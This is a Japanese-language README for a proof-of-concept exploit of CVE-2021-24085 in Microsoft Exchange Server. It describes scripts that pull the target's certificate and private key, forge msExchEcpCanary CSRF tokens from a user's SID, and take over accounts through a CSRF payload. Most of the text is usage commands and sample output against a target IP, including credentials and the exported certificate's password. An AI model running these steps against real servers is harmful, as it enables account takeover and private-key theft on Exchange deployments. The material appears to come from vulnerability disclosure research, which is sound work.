
CVE-2021-24085の概念実証エクスプロイト: msExchEcpCanaryトークンの偽造によるMicrosoft Exchange ServerのCSRFベースの権限昇格、アカウントの乗っ取りを可能にします。
これはCVE-2021-24085の概念実証です。
poc.py は、内部に秘密鍵を含むターゲットの証明書ファイルをダウンロードします。YellowCanary は、SIDに基づいて特定のユーザーのmsExchEcpCanary CSRFトークンを生成します。poc.js は、アカウント乗っ取りを引き起こすCSRFエクスプロイトです。malicifest.xmlファイルは提供していませんが、以下の参考文献セクションの利用可能なリソースから悪意のあるマニフェストファイルを生成する方法を見つけることができます。
内部に秘密鍵を含む証明書にアクセスします:
researcher@srcincite:~$ ./poc.py
(+) usage: ./poc.py <target> <user:pass>
(+) eg: ./poc.py 192.168.75.142 [email protected]:user123###
researcher@srcincite:~$ ./poc.py 192.168.75.142 [email protected]:user123###
(+) found the thumbprint: F4EB6AADB8D7C0D12E756BA2E28F90CCACD41299
(+) exported the cert to the target filesystem
(+) saved the cert to testcert.der using password: hax
次に、YellowCanaryを使用して、ターゲットユーザーのSIDからCSRFトークンを生成できます:
c:\Users\researcher>poc.exe S-1-5-21-257332918-392067043-4020791575-3104 testcert.der hax
#====================================================
# YellowCanary - generate msExchEcpCanary csrf tokens
#====================================================
security identifier : S-1-5-21-257332918-392067043-4020791575-3104
msExchEcpCanary : sA0o0nS_C0G_PMdcA_dAd5BdAEL_-NcYhndaAwlhBJFs4a4iKy4sn53azH-O5Ix3F0jnwzZZUsk.